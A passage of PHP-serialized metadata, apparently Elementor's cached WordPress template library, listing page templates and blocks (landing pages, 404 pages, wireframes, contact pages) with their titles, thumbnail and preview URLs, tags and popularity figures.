Pages\"]\";s:10:\"menu_order\";i:30;s:16:\"popularity_index\";i:800;s:11:\"trend_index\";i:556;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:253;a:21:{s:4:\"tmpl\";i:1220;s:2:\"id\";i:20908;s:5:\"title\";s:42:\"Packing & Moving Company – Home\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2021/12/3-Home-Packing-Moving-Company.jpg\";s:12:\"tmpl_created\";i:1638786127;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/packing-moving-company-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Movers\",\"Moving\",\"Storge\"]\";s:10:\"menu_order\";i:30;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:254;a:21:{s:4:\"tmpl\";i:1152;s:2:\"id\";i:17032;s:5:\"title\";s:42:\"Donate Computer – Social Involvement\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2021/01/Donation-2.png\";s:12:\"tmpl_created\";i:1610630585;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/donate-computer-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:18:\"Social Involvement\";s:4:\"tags\";s:67:\"[\"Computer\",\"Donate\",\"Donation\",\"Kids\",\"Landing Pages\",\"Nonprofit\"]\";s:10:\"menu_order\";i:31;s:16:\"popularity_index\";i:718;s:11:\"trend_index\";i:278;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:255;a:21:{s:4:\"tmpl\";i:672;s:2:\"id\";i:8512;s:5:\"title\";s:11:\"404 page 03\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/003.jpg\";s:12:\"tmpl_created\";i:1526415449;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-03/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:31;s:16:\"popularity_index\";i:450;s:11:\"trend_index\";i:375;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:256;a:21:{s:4:\"tmpl\";i:1245;s:2:\"id\";i:21546;s:5:\"title\";s:28:\"Interior Design – Home\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/12/1-Home-Interior-Design-1.jpg\";s:12:\"tmpl_created\";i:1639046269;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/interior-design-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:68:\"[\"Design\",\"Form\",\"Furniture Design\",\"Interior Design\",\"Testimonial\"]\";s:10:\"menu_order\";i:31;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:257;a:21:{s:4:\"tmpl\";i:1135;s:2:\"id\";i:16684;s:5:\"title\";s:34:\"SaaS HR Management – Product\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2021/01/lp_hr.png\";s:12:\"tmpl_created\";i:1609945486;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/saas-hr-management-product/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:7:\"Product\";s:4:\"tags\";s:39:\"[\"HR\",\"Landing Pages\",\"Product\",\"SaaS\"]\";s:10:\"menu_order\";i:32;s:16:\"popularity_index\";i:708;s:11:\"trend_index\";i:292;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:258;a:21:{s:4:\"tmpl\";i:671;s:2:\"id\";i:8513;s:5:\"title\";s:11:\"404 page 04\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/004.jpg\";s:12:\"tmpl_created\";i:1526415417;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-04/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:32;s:16:\"popularity_index\";i:420;s:11:\"trend_index\";i:176;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:259;a:21:{s:4:\"tmpl\";i:1249;s:2:\"id\";i:22137;s:5:\"title\";s:31:\"Design Blog – Coming Soon\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2021/10/Design-Blog-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1647177194;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/design-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:47:\"[\"Blog\",\"Coming Soon\",\"Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:32;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:260;a:21:{s:4:\"tmpl\";i:1134;s:2:\"id\";i:16660;s:5:\"title\";s:37:\"Medical center – Online service\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/01/Online-medical-cosultation-250_280.png\";s:12:\"tmpl_created\";i:1609945122;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/lp/medical-center-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:44:\"[\"Landing Pages\",\"Medical\",\"Online Service\"]\";s:10:\"menu_order\";i:33;s:16:\"popularity_index\";i:750;s:11:\"trend_index\";i:332;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:261;a:21:{s:4:\"tmpl\";i:1226;s:2:\"id\";i:21069;s:5:\"title\";s:21:\"Hotel – Contact\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/12/9-Contact-Hotel.jpg\";s:12:\"tmpl_created\";i:1638798545;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/hotel-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:36:\"[\"Contact\",\"from\",\"Info\",\"Vacation\"]\";s:10:\"menu_order\";i:33;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:262;a:21:{s:4:\"tmpl\";i:1150;s:2:\"id\";i:17001;s:5:\"title\";s:36:\"Parental Counseling – Business\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2021/01/Parenting-Coach-2.png\";s:12:\"tmpl_created\";i:1610534999;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/parental-counseling-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:99:\"[\"Advisor\",\"Business\",\"Coach\",\"Counseling\",\"Landing Pages\",\"Online Service\",\"Parental\",\"Parenting\"]\";s:10:\"menu_order\";i:34;s:16:\"popularity_index\";i:817;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:263;a:21:{s:4:\"tmpl\";i:1432;s:2:\"id\";i:24461;s:5:\"title\";s:27:\"Wireframe – Gallery 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Gallery-1.jpg\";s:12:\"tmpl_created\";i:1653988784;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-gallery-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:82:\"[\"Business\",\"Contact\",\"Design\",\"Footer\",\"Gallery\",\"Header\",\"Portfolio\",\"Services\"]\";s:10:\"menu_order\";i:34;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:264;a:21:{s:4:\"tmpl\";i:676;s:2:\"id\";i:8514;s:5:\"title\";s:11:\"404 Page 05\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/005.jpg\";s:12:\"tmpl_created\";i:1526415558;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-05/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:34;s:16:\"popularity_index\";i:419;s:11:\"trend_index\";i:220;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:265;a:21:{s:4:\"tmpl\";i:1137;s:2:\"id\";i:16742;s:5:\"title\";s:31:\"Online Course – Education\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2021/01/Online-Course.png\";s:12:\"tmpl_created\";i:1610454122;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/online-course-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Education\";s:4:\"tags\";s:55:\"[\"Academy\",\"Course Online\",\"Education\",\"Landing Pages\"]\";s:10:\"menu_order\";i:35;s:16:\"popularity_index\";i:777;s:11:\"trend_index\";i:776;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:266;a:21:{s:4:\"tmpl\";i:668;s:2:\"id\";i:8523;s:5:\"title\";s:11:\"404 page 06\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/006.jpg\";s:12:\"tmpl_created\";i:1526415291;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-06/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:35;s:16:\"popularity_index\";i:298;s:11:\"trend_index\";i:268;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:267;a:21:{s:4:\"tmpl\";i:1440;s:2:\"id\";i:24563;s:5:\"title\";s:27:\"Wireframe – Contact 4\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-4.jpg\";s:12:\"tmpl_created\";i:1653989095;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:84:\"[\"Business\",\"Contact\",\"Footer\",\"Form\",\"Gallery\",\"Header\",\"Professional\",\"Subscribe\"]\";s:10:\"menu_order\";i:35;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:268;a:21:{s:4:\"tmpl\";i:1162;s:2:\"id\";i:17284;s:5:\"title\";s:38:\"Dietitian – Health & Fitness\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/01/Dietitian.png\";s:12:\"tmpl_created\";i:1610903484;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/dietitian-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:39:\"[\"Fitness\",\"Health\",\"landscape design\"]\";s:10:\"menu_order\";i:36;s:16:\"popularity_index\";i:814;s:11:\"trend_index\";i:800;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:269;a:21:{s:4:\"tmpl\";i:1439;s:2:\"id\";i:24553;s:5:\"title\";s:27:\"Wireframe – Contact 3\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-3.jpg\";s:12:\"tmpl_created\";i:1653989057;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:67:\"[\"Business\",\"Contact\",\"Footer\",\"Form\",\"Professional\",\"Testimonial\"]\";s:10:\"menu_order\";i:36;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:270;a:21:{s:4:\"tmpl\";i:1144;s:2:\"id\";i:16897;s:5:\"title\";s:30:\"Personal Chef – Business\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2021/01/Personal-Chef.png\";s:12:\"tmpl_created\";i:1610466247;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/personal-chef-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:53:\"[\"Business\",\"Chef\",\"Food\",\"Landing Pages\",\"Services\"]\";s:10:\"menu_order\";i:37;s:16:\"popularity_index\";i:795;s:11:\"trend_index\";i:617;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:271;a:21:{s:4:\"tmpl\";i:1435;s:2:\"id\";i:24504;s:5:\"title\";s:28:\"Wireframe – Services 2\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-2.jpg\";s:12:\"tmpl_created\";i:1653988910;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/wireframe-services-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:80:\"[\"Business\",\"Contact\",\"Footer\",\"Header\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:37;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:272;a:21:{s:4:\"tmpl\";i:669;s:2:\"id\";i:8524;s:5:\"title\";s:11:\"404 page 07\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/007.jpg\";s:12:\"tmpl_created\";i:1526415337;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-07/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:37;s:16:\"popularity_index\";i:303;s:11:\"trend_index\";i:171;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:273;a:21:{s:4:\"tmpl\";i:1147;s:2:\"id\";i:16946;s:5:\"title\";s:52:\"Online Full-Stack Developer Course – Education\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/01/Online-Full-Stack-Developer-Course.png\";s:12:\"tmpl_created\";i:1610532778;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/lp/online-full-stack-developer-course-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"Education\";s:4:\"tags\";s:76:\"[\"Academy\",\"Coding\",\"Course Online\",\"Developer\",\"Education\",\"Landing Pages\"]\";s:10:\"menu_order\";i:38;s:16:\"popularity_index\";i:805;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:274;a:21:{s:4:\"tmpl\";i:1437;s:2:\"id\";i:24528;s:5:\"title\";s:27:\"Wireframe – Contact 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-1.jpg\";s:12:\"tmpl_created\";i:1653988981;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:76:\"[\"Business\",\"Contact\",\"Footer\",\"Form\",\"Google Maps\",\"Header\",\"Professional\"]\";s:10:\"menu_order\";i:38;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:275;a:21:{s:4:\"tmpl\";i:1143;s:2:\"id\";i:16868;s:5:\"title\";s:40:\"Virtual Assistant – Online Service\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2021/01/Virtual-Assistant-250x280-1.png\";s:12:\"tmpl_created\";i:1610465656;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/virtual-assistant-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:46:\"[\"Assistant\",\"Landing Pages\",\"Online Service\"]\";s:10:\"menu_order\";i:39;s:16:\"popularity_index\";i:793;s:11:\"trend_index\";i:757;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:276;a:21:{s:4:\"tmpl\";i:673;s:2:\"id\";i:8526;s:5:\"title\";s:11:\"404 page 09\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/009.jpg\";s:12:\"tmpl_created\";i:1526415474;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-09/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:39;s:16:\"popularity_index\";i:477;s:11:\"trend_index\";i:285;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:277;a:21:{s:4:\"tmpl\";i:1228;s:2:\"id\";i:21104;s:5:\"title\";s:26:\"Restaurant – Contact\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2021/12/11-Contact-Restaurant.jpg\";s:12:\"tmpl_created\";i:1638800146;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/restaurant-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:60:\"[\"Contact\",\"Food\",\"Form\",\"Google Maps\",\"Info\",\"Testimonial\"]\";s:10:\"menu_order\";i:39;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:278;a:21:{s:4:\"tmpl\";i:1140;s:2:\"id\";i:16812;s:5:\"title\";s:40:\"Construction Project – Real Estate\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/01/Construction-Project.png\";s:12:\"tmpl_created\";i:1610463582;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/construction-project-real-estate/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"Real Estate\";s:4:\"tags\";s:59:\"[\"Construction\",\"Landing Pages\",\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:40;s:16:\"popularity_index\";i:796;s:11:\"trend_index\";i:724;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:279;a:21:{s:4:\"tmpl\";i:1244;s:2:\"id\";i:21393;s:5:\"title\";s:34:\"Interior Designer – Projects\";s:9:\"thumbnail\";s:99:\"https://library.elementor.com/wp-content/uploads/2021/12/big-22-Projects-Interior-Designer-New.jpeg\";s:12:\"tmpl_created\";i:1638823945;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/interior-designer-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:93:\"[\"Creative\",\"Creative 